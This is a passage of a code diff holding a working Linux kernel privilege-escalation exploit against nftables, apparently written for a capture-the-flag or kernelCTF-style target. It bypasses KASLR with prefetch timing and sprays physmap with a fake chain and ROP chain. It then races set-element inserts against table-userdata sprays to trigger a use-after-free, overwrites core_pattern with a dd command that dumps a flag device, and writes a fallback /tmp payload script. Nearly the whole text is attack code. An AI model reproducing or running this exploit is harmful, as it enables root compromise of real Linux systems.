-1 : 0; +} + +static int nl_drain(int fd) { + uint8_t buf[16384]; + for (;;) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r <= 0) break; + } + return 0; +} + +static int nl_wait_acks(int fd, int n, int tmo_ms) { + struct timespec start, now; + clock_gettime(CLOCK_MONOTONIC, &start); + int seen = 0, last = 0; + uint8_t buf[16384]; + while (seen < n) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r > 0) { + int rem = static_cast(r); + for (struct nlmsghdr *nlh = reinterpret_cast(buf); + NLMSG_OK(nlh, static_cast(rem)); nlh = NLMSG_NEXT(nlh, rem)) { + if (nlh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = static_cast(NLMSG_DATA(nlh)); + seen++; + last = e->error; + } + } + } + clock_gettime(CLOCK_MONOTONIC, &now); + long ms = (now.tv_sec-start.tv_sec)*1000 + (now.tv_nsec-start.tv_nsec)/1000000; + if (ms > tmo_ms) return -ETIMEDOUT; + if (r <= 0) { + // @sleep(desc="poll backoff waiting for netlink ACKs") + struct timespec sl = {0, NL_POLL_SLEEP_NS}; + nanosleep(&sl, nullptr); + } + } + return last; +} + +/* ========== batch helpers ========== */ +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL) + +static int batch_begin(struct nlbuf *nb, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(nb, NFNL_MSG_BATCH_BEGIN, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 0 : -1; +} +static int batch_end(struct nlbuf *nb, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(nb, NFNL_MSG_BATCH_END, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 
0 : -1; +} + +/* ========== namespace setup ========== */ +// @step(name="Namespace Setup") +static void xwrite(const char *path, const char *str) { + int fd = open(path, O_WRONLY|O_CLOEXEC); + if (fd < 0) die(path); + if (write(fd, str, strlen(str)) < 0) { /* ignore */ } + close(fd); +} + +static void setup_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + if (uid == 0) { + setresgid(DROP_GID, DROP_GID, DROP_GID); + setresuid(DROP_UID, DROP_UID, DROP_UID); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + uid = getuid(); + gid = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(USER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char mapbuf[64]; + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", uid); + xwrite("/proc/self/uid_map", mapbuf); + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", gid); + xwrite("/proc/self/gid_map", mapbuf); + setresgid(0, 0, 0); + setresuid(0, 0, 0); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NET)"); + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd >= 0) { + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP|IFF_RUNNING; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + } +} + +/* forward declaration for pin_cpu */ +static void pin_cpu(int cpu); + +/* ========== KASLR bypass (prefetch timing) ========== */ +// @step(name="KASLR Bypass via Entrybleed") +#ifdef __x86_64__ + +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) { + uint64_t lo, hi; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(hi), "=r"(lo) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (hi << 32) | lo; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) { + uint64_t lo, hi; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(hi), "=r"(lo) + : + : "%rax", 
"%rbx", "%rcx", "%rdx"); + return (hi << 32) | lo; +} + +static uint64_t time_prefetch(const void *p, int n) { + uint64_t best = ~0ULL; + for (int i = 0; i < n; i++) { + uint64_t t1 = rdtsc_begin(); + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r"(p)); + uint64_t delta = rdtsc_end() - t1; + if (delta < best) best = delta; + } + return best; +} + +// @step(name="KASLR Leak: Detect kbase") +static uint64_t leak_detect_kbase(void) { + #define KB_START 0xffffffff81000000ULL + #define KB_END 0xffffffffD0000000ULL + #define KB_COARSE 0x1000000ULL /* 16MB */ + #define KB_FINE 0x200000ULL /* 2MB */ + #define KB_VOTES 7 + + /* Phase 1: coarse scan (16MB steps) */ + printf("[*] kbase: coarse scan (16MB steps, %d votes)...\n", KB_VOTES); + uint64_t coarse = KB_START; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + int naddr = static_cast((KB_END - KB_START) / KB_COARSE); + uint64_t best_t = ~0ULL, best_a = KB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = KB_START + KB_COARSE * static_cast(ti); + uint64_t t = time_prefetch(reinterpret_cast(addr), KB_COARSE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + /* Boyer-Moore majority vote */ + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] kbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { + coarse = cand; + break; + } + printf("[*] kbase: retrying coarse scan...\n"); + } + + /* Phase 2: fine scan (2MB steps around coarse result) */ + printf("[*] kbase: fine scan (2MB steps around %#lx)...\n", + (unsigned long)coarse); + uint64_t fine_start = (coarse > KB_START + KB_COARSE) ? 
+ coarse - KB_COARSE : KB_START; + uint64_t fine_end = coarse + 2 * KB_COARSE; + if (fine_end > KB_END) fine_end = KB_END; + + uint64_t result = coarse; + for (int attempt = 0; attempt < 3; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += KB_FINE) { + uint64_t t = time_prefetch(reinterpret_cast(addr), KB_FINE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] kbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { + result = cand; + break; + } + } + + return result; +} + +// @step(name="KASLR Leak: Detect phbase") +static uint64_t leak_detect_phbase(void) { + #define PB_START 0xffff888000000000ULL + #define PB_COARSE 0x4000000000ULL /* 256GB */ + #define PB_CRANGE 0x100000000000ULL /* 16TB coarse range */ + #define PB_STEP 0x40000000ULL /* 1GB */ + #define PB_VOTES 7 + + printf("[*] phbase: coarse scan (256GB steps, 16TB range, %d votes)...\n", PB_VOTES); + uint64_t coarse = PB_START; + for (int attempt = 0; attempt < 10; attempt++) { + uint64_t votes[PB_VOTES]; + int naddr = static_cast(PB_CRANGE / PB_COARSE); + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = PB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = PB_START + PB_COARSE * static_cast(ti); + uint64_t t = time_prefetch(reinterpret_cast(addr), PB_COARSE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 
1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] phbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { + coarse = cand; + break; + } + if (attempt < 9) printf("[*] phbase: retrying coarse...\n"); + } + + uint64_t fine_start = (coarse > PB_START + PB_COARSE/2) ? + coarse - PB_COARSE/2 : PB_START; + uint64_t fine_end = coarse + PB_COARSE + PB_COARSE/2; + printf("[*] phbase: fine scan (1GB steps, %#lx-%#lx)...\n", + (unsigned long)fine_start, (unsigned long)fine_end); + + uint64_t result = coarse; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[PB_VOTES]; + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += PB_STEP) { + uint64_t t = time_prefetch(reinterpret_cast(addr), PB_COARSE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] phbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { + result = cand; + break; + } + } + + /* Apply -4GB KVM correction */ + if (result > PB_START + KVM_PH_CORRECTION) { + uint64_t corrected = result - KVM_PH_CORRECTION; + printf("[+] phbase KVM corrected: %#lx -> %#lx\n", + (unsigned long)result, (unsigned long)corrected); + result = corrected; + } + + return result; +} + +static void leak_entrybleed(void) { + pin_cpu(RACE_CPU); + + /* Detect kbase */ + uint64_t kb = leak_detect_kbase(); + eb_kbases[0] = kb; + eb_nkb = 1; + kbase = kb; + printf("[+] kbase=%#lx\n", (unsigned long)kbase); + + /* Store coarse +-16MB as 
alternative candidates */
+ if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb - KB_COARSE;
+ if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb + KB_COARSE;
+
+ /* Skip phbase detection -- not needed for __init_begin approach */
+ phbase = 0xffff888000000000ULL;
+ eb_phbases[0] = phbase;
+ eb_npb = 1;
+}
+#else
+static void leak_entrybleed(void) { die("x86_64 only"); }
+#endif
+
+/* ========== physmap (MAP_SHARED for post-fork updates) ========== */
+// @step(name="Physmap Spray with Fake Chain + ROP Blob")
+static void spray_physmap(void) {
+ size_t sz = static_cast<size_t>(physmap_mb) << 20;
+ phys_region = mmap(nullptr, sz, PROT_READ|PROT_WRITE,
+ MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
+ if (phys_region == MAP_FAILED) die("mmap physmap");
+ printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region);
+}
+
+// @step(name="Leak Physmap KVA via Pagemap")
+static uint64_t leak_physmap_kva(void) {
+ int fd = open("/proc/self/pagemap", O_RDONLY);
+ if (fd < 0) return 0;
+ uint64_t entry = 0;
+ pread(fd, &entry, 8, static_cast<off_t>((reinterpret_cast<uintptr_t>(phys_region)) / 4096) * 8);
+ close(fd);
+ if (!(entry & (1ULL << 63))) return 0;
+ uint64_t pfn = entry & ((1ULL << 55) - 1);
+ if (!pfn) return 0;
+ return phbase + pfn * 4096;
+}
+
+/*
+ * Fill every physmap page with the fake chain + ROP blob.
+ *
+ * Page layout (4096 bytes):
+ * +0x000: Fake nft_chain (96 bytes)
+ * +0x080: Fake nft_rule_blob (variable size, XDK-generated ROP words)
+ * +0x300: Name string "x\0"
+ *
+ * ROP words are generated by kernelXDK (WRITE_WHAT_WHERE_64 + MSLEEP)
+ * and serialized into nft_immediate_eval expressions that write 16-byte
+ * chunks into nft_do_chain's return-address region via dreg. 
+ */
+static uint64_t pack_u64_le(const char *src, size_t len) {
+ uint64_t word = 0;
+ memcpy(&word, src, len);
+ return word;
+}
+
+static const char *pick_flag_device(void) {
+ if (access("/dev/vdb", R_OK) == 0)
+ return "/dev/vdb";
+ if (access("/dev/vda", R_OK) == 0)
+ return "/dev/vda";
+ return "/dev/vdb";
+}
+
+static std::vector<uint64_t> build_xdk_postrip_words(uint64_t core_pattern) {
+ char payload[64];
+ const char *flag_dev = pick_flag_device();
+ int n = snprintf(payload, sizeof(payload),
+ "|/bin/dd if=%s of=/dev/ttyS0", flag_dev);
+ if (n < 0 || static_cast<size_t>(n) >= sizeof(payload))
+ die("snprintf core_pattern payload");
+ size_t payload_len = strlen(payload) + 1;
+ printf("[*] core_pattern payload device: %s\n", flag_dev);
+
+ if (!g_xdk_target)
+ die("kernelXDK post-RIP target unavailable");
+
+ RopChain rop(*g_xdk_target, kbase);
+
+ for (size_t off = 0; off < payload_len; off += 8) {
+ size_t rem = payload_len - off;
+ size_t n = rem < 8 ? rem : 8;
+ uint64_t chunk = pack_u64_le(payload + off, n);
+ /* kernelXDK WRITE_WHAT_WHERE_64 expects {where, what}. */
+ rop.AddRopAction(RopActionId::WRITE_WHAT_WHERE_64,
+ {core_pattern + off, chunk});
+ }
+ rop.AddRopAction(RopActionId::MSLEEP, {MSLEEP_FOREVER});
+ std::vector<uint64_t> words = rop.GetDataWords();
+ if (words.empty()) {
+ fprintf(stderr, "[!] 
xdk: generated empty post-RIP chain\n");
+ _exit(1);
+ }
+ return words;
+}
+
+static void emit_nft_immediate_expr(uint8_t *expr, uint64_t nft_imm_ops,
+ uint8_t dreg, uint64_t lo, uint64_t hi) {
+ memset(expr, 0, 32);
+ memcpy(expr, &nft_imm_ops, 8);
+ memcpy(expr + 8, &lo, 8);
+ memcpy(expr + 16, &hi, 8);
+ expr[24] = dreg;
+ expr[25] = DREG_EXPR_LEN;
+}
+
+static void rop_fill_physmap(void) {
+ uint64_t nft_imm_ops = kbase + off_nft_imm_ops;
+ uint64_t core_pattern = kbase + off_core_pattern;
+ std::vector<uint64_t> rop_words = build_xdk_postrip_words(core_pattern);
+ size_t expr_count = (rop_words.size() + 1) / 2;
+ uint64_t blob_size = 16 + expr_count * 32;
+ size_t blob_footprint = 8 + blob_size;
+
+ if (BLOB_OFFSET + blob_footprint > NAME_OFFSET) {
+ fprintf(stderr,
+ "[!] XDK ROP blob (%zu bytes) overlaps name area\n",
+ blob_footprint);
+ _exit(1);
+ }
+
+ uint8_t page[4096];
+ memset(page, 0, sizeof(page));
+
+ /* ---- Fake nft_chain at page+0 ---- */
+ uint64_t blob_ptr = g_page_kva + BLOB_OFFSET;
+ memcpy(page + NFT_CHAIN_OFFS_BLOB0, &blob_ptr, 8);
+ memcpy(page + NFT_CHAIN_OFFS_BLOB1, &blob_ptr, 8);
+ uint64_t tbl = kbase;
+ memcpy(page + NFT_CHAIN_OFFS_TABLE, &tbl, 8);
+ uint32_t use = 1;
+ memcpy(page + NFT_CHAIN_OFFS_USE, &use, 4);
+ page[NFT_CHAIN_OFFS_FLAGS] = 0;
+ uint64_t name_ptr = g_page_kva + NAME_OFFSET;
+ memcpy(page + NFT_CHAIN_OFFS_NAME, &name_ptr, 8);
+
+ /* ---- Name string at page+0x300 ---- */
+ page[NAME_OFFSET] = 'x';
+ page[NAME_OFFSET+1] = 0;
+
+ /* ---- Fake nft_rule_blob at page+0x80 ---- */
+ uint8_t *blob = page + BLOB_OFFSET;
+ memcpy(blob, &blob_size, 8);
+
+ /* First rule_dp: dlen = expr_count * 32, is_last = 0 */
+ uint64_t rdp = static_cast<uint64_t>(expr_count * 32) << 1;
+ memcpy(blob + 8, &rdp, 8);
+
+ for (size_t i = 0; i < expr_count; i++) {
+ uint64_t lo = rop_words[i * 2];
+ uint64_t hi = (i * 2 + 1 < rop_words.size()) ? 
rop_words[i * 2 + 1] : 0; + emit_nft_immediate_expr(blob + 16 + i * 32, nft_imm_ops, + DREG_RET + static_cast(i * 4), + lo, hi); + } + + /* Terminator rule_dp at blob+blob_size: is_last=1 */ + uint64_t term = 1; + memcpy(blob + blob_size, &term, 8); + + /* Fill all physmap pages */ + size_t sz = static_cast(physmap_mb) << 20; + for (size_t o = 0; o < sz; o += 4096) + memcpy(static_cast(phys_region) + o, page, sizeof(page)); + printf("[+] physmap filled with XDK ROP chain (%zu qwords, kva=%#lx)\n", + rop_words.size(), (unsigned long)g_page_kva); +} + +/* ========== in-batch spray: NEWTABLE userdata for kmalloc-cg-64 ========== */ +// @step(name="In-batch NEWTABLE Userdata Spray") +/* + * Build spray userdata (52 bytes) that overlays a freed nft_hash_elem. + * + * Object layout (kmalloc-cg-64, element with key_len=4 verdict map): + * +0: hlist_node.next (8B) - reader already past this + * +8: hlist_node.pprev (8B) - reader already past this + * +16: ext.genmask (1B) = 0 (active) + * +17: ext.offset[KEY] (1B) = 16 (KEY at ext+16 = obj+32) + * +18: ext.offset[1] (1B) = 0 + * +19: ext.offset[DATA] (1B) = 20 (DATA at ext+20 = obj+36) + * +32: KEY data (4B) = htonl(KEY_RACE) + * +36: verdict.code (4B) = NFT_GOTO + * +40: verdict padding (4B) = 0 + * +44: verdict.chain (8B) = physmap fake chain KVA + */ +static void spray_build_udata(uint8_t udata[SPRAY_UDATA_LEN], uint64_t chain_kva) { + memset(udata, 0, SPRAY_UDATA_LEN); + udata[NFT_HASH_ELEM_OFFS_GENMASK] = 0; /* ext.genmask = 0 (active in current generation) */ + udata[NFT_HASH_ELEM_OFFS_KEY_OFF] = 16; /* ext.offset[KEY] = 16 */ + udata[NFT_HASH_ELEM_OFFS_DATA_OFF] = 20; /* ext.offset[DATA] = 20 */ + *reinterpret_cast(udata + NFT_HASH_ELEM_OFFS_KEY) = htonl(KEY_RACE); + *reinterpret_cast(udata + NFT_HASH_ELEM_OFFS_VERDICT) = NFT_GOTO_CODE; + *reinterpret_cast(udata + NFT_HASH_ELEM_OFFS_CHAIN) = chain_kva; +} + +/* ========== nft object creation ========== */ +// @step(name="nft Object Creation") +static int 
vuln_setup_nft(int fd, uint32_t pid) { + uint8_t buf[65536]; + struct nlbuf nb; + nlbuf_init(&nb, buf, sizeof(buf)); + uint32_t seq = 1; + + batch_begin(&nb, seq++, pid); + + /* 1. Table */ + struct nlmsghdr *nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWTABLE), NLC, + seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_TABLE_NAME, "t"); + + /* 2. Base chain (LOCAL_OUT hook) */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWCHAIN), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_CHAIN_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_CHAIN_NAME, "bc"); + struct nlattr *hk = nlbuf_nest_start(&nb, nlh, NFTA_CHAIN_HOOK); + nl_u32be(&nb, nlh, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nl_u32be(&nb, nlh, NFTA_HOOK_PRIORITY, static_cast(NF_IP_PRI_FILTER)); + nlbuf_nest_end(&nb, hk); + + /* 3. Verdict map (hash, size=1, key_len=4) */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWSET), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_SET_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_SET_NAME, "vm"); + nl_u32be(&nb, nlh, NFTA_SET_FLAGS, NFT_SET_MAP); + nl_u32be(&nb, nlh, NFTA_SET_KEY_LEN, 4); + nl_u32be(&nb, nlh, NFTA_SET_DATA_TYPE, SET_DATA_TYPE_VERDICT); + nl_u32be(&nb, nlh, NFTA_SET_DATA_LEN, 16); + nl_u32be(&nb, nlh, NFTA_SET_ID, SET_ID_SPRAY); + nl_u32be(&nb, nlh, NFTA_SET_POLICY, NFT_SET_POL_PERFORMANCE); + struct nlattr *desc = nlbuf_nest_start(&nb, nlh, NFTA_SET_DESC); + nl_u32be(&nb, nlh, NFTA_SET_DESC_SIZE, 1); + nlbuf_nest_end(&nb, desc); + + /* 4. 
Fill element: key=0, verdict=NF_ACCEPT */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_KEY); + uint32_t kf = htonl(KEY_FILL); + nlbuf_put(&nb, nlh, NFTA_DATA_VALUE, &kf, 4); + nlbuf_nest_end(&nb, kn); + struct nlattr *dn = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_DATA); + struct nlattr *vn = nlbuf_nest_start(&nb, nlh, NFTA_DATA_VERDICT); + nl_u32be(&nb, nlh, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&nb, vn); + nlbuf_nest_end(&nb, dn); + nlbuf_nest_end(&nb, el); + nlbuf_nest_end(&nb, els); + + /* 5. Rule: immediate(KEY_RACE) + lookup(vm) */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWRULE), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_RULE_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_RULE_CHAIN, "bc"); + struct nlattr *exs = nlbuf_nest_start(&nb, nlh, NFTA_RULE_EXPRESSIONS); + { + struct nlattr *ee = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + nl_strz(&nb, nlh, NFTA_EXPR_NAME, "immediate"); + struct nlattr *ed = nlbuf_nest_start(&nb, nlh, NFTA_EXPR_DATA); + nl_u32be(&nb, nlh, NFTA_IMMEDIATE_DREG, NFT_REG32_00); + struct nlattr *id = nlbuf_nest_start(&nb, nlh, NFTA_IMMEDIATE_DATA); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&nb, nlh, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&nb, id); + nlbuf_nest_end(&nb, ed); + nlbuf_nest_end(&nb, ee); + } + { + struct nlattr *ee = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + nl_strz(&nb, nlh, NFTA_EXPR_NAME, "lookup"); + struct nlattr *ed = nlbuf_nest_start(&nb, nlh, NFTA_EXPR_DATA); + nl_strz(&nb, nlh, NFTA_LOOKUP_SET, "vm"); + nl_u32be(&nb, nlh, NFTA_LOOKUP_SREG, NFT_REG32_00); + nl_u32be(&nb, nlh, NFTA_LOOKUP_DREG, 
NFT_REG_VERDICT); + nlbuf_nest_end(&nb, ed); + nlbuf_nest_end(&nb, ee); + } + nlbuf_nest_end(&nb, exs); + + batch_end(&nb, seq++, pid); + + if (nl_send(fd, nb.buf, nb.len) < 0) return -1; + return nl_wait_acks(fd, 5, 5000); +} + +/* ========== build race batch: NEWSETELEM + NEWTABLE spray interleaved ========== */ +// @step(name="Race: Build Race Batch") +static int race_build_batch(uint8_t *buf, size_t cap, uint32_t *seq, + uint32_t pid, int count, uint64_t *table_id, + const uint8_t *spray_udata) { + struct nlbuf nb; + nlbuf_init(&nb, buf, cap); + batch_begin(&nb, (*seq)++, pid); + + char tname[24]; + for (int i = 0; i < count; i++) { + /* NEWSETELEM: insert element with KEY_RACE -> err_set_full -> kfree */ + struct nlmsghdr *nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_INET, 0); + if (!nlh) break; + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_KEY); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&nb, nlh, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&nb, kn); + struct nlattr *dn2 = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_DATA); + struct nlattr *vvn = nlbuf_nest_start(&nb, nlh, NFTA_DATA_VERDICT); + nl_u32be(&nb, nlh, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&nb, vvn); + nlbuf_nest_end(&nb, dn2); + nlbuf_nest_end(&nb, el); + nlbuf_nest_end(&nb, els); + + /* NEWTABLE: spray userdata into kmalloc-cg-64 to reclaim freed slot */ + unsigned long long tid = static_cast((*table_id)++); + snprintf(tname, sizeof(tname), "s%016llx", tid); + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWTABLE), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_IPV4, 0); + if (!nlh) break; + nl_strz(&nb, nlh, 
NFTA_TABLE_NAME, tname); + nlbuf_put(&nb, nlh, NFTA_TABLE_USERDATA, spray_udata, SPRAY_UDATA_LEN); + } + + batch_end(&nb, (*seq)++, pid); + return static_cast(nb.len); +} + +/* ========== CPU pinning ========== */ +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +/* ========== race threads ========== */ +// @step(name="Race: Writer + Packet Threads") +struct race_args { + int writer_fd; + uint32_t writer_pid; + pthread_barrier_t *bar; + uint64_t chain_kva; +}; + +static void *race_writer_thread(void *arg) { + struct race_args *a = static_cast(arg); + pin_cpu(RACE_CPU); + pthread_barrier_wait(a->bar); + + uint8_t buf[1048576]; + uint32_t seq = RACE_SEQ_START; + uint64_t table_id = (static_cast(a->writer_pid) << 32) ^ + static_cast(time(nullptr)); + uint64_t batches = 0; + + /* Build spray userdata: fake element with NFT_GOTO(physmap_chain) */ + uint8_t spray_udata[SPRAY_UDATA_LEN]; + spray_build_udata(spray_udata, a->chain_kva); + + printf("[*] writer: starting race with in-batch NEWTABLE spray (%d pairs/batch)\n", + SPRAY_BATCH_PAIRS); + + while (!g_stop) { + int len = race_build_batch(buf, sizeof(buf), &seq, a->writer_pid, + SPRAY_BATCH_PAIRS, &table_id, spray_udata); + if (len > 0) nl_send(a->writer_fd, buf, static_cast(len)); + nl_drain(a->writer_fd); + batches++; + + if (batches % WRITER_PROGRESS == 0) + printf("[*] writer: %lu batches\n", (unsigned long)batches); + } + + return nullptr; +} + +static void *race_packet_thread(void *arg) { + struct race_args *a = static_cast(arg); + pin_cpu(FLOOD_CPU); + pthread_barrier_wait(a->bar); + + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd < 0) return nullptr; + + struct sockaddr_in dst = {}; + dst.sin_family = AF_INET; + dst.sin_port = htons(UDP_PORT); + dst.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + char pkt[1] = {'A'}; + + connect(fd, reinterpret_cast(&dst), sizeof(dst)); + + while (!g_stop) { + for (int i = 0; i 
< 10000 && !g_stop; i++) { + send(fd, pkt, 1, MSG_DONTWAIT); + } + } + close(fd); + return nullptr; +} + +/* ========== core_pattern polling + SIGSEGV trigger ========== */ +// @step(name="core_pattern Overwrite Detection and Flag Exfiltration") +static int setup_check_core_pattern(void) { + int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (fd < 0) return 0; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n <= 0) return 0; + buf[n] = 0; + return strstr(buf, "/bin/dd") != nullptr; +} + +static void setup_trigger_core_dump(void) { + printf("[*] triggering core dump via SIGSEGV...\n"); + pid_t child = fork(); + if (child == 0) { + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + raise(SIGSEGV); + _exit(1); + } + if (child > 0) { + int status; + waitpid(child, &status, 0); + printf("[*] core dump child exited (sig=%d)\n", + WIFSIGNALED(status) ? WTERMSIG(status) : 0); + } +} + +/* ========== modprobe_path fallback (for local QEMU testing) ========== */ +// @step(name="Setup Payload Scripts") +static void setup_payload(void) { + int fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + const char *s = + "#!/bin/sh\n" + "/bin/cat /dev/vdb > /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vda >> /tmp/flag 2>/dev/null\n" + "/bin/cat /flag >> /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "/bin/cat /dev/vda >> /dev/ttyS0 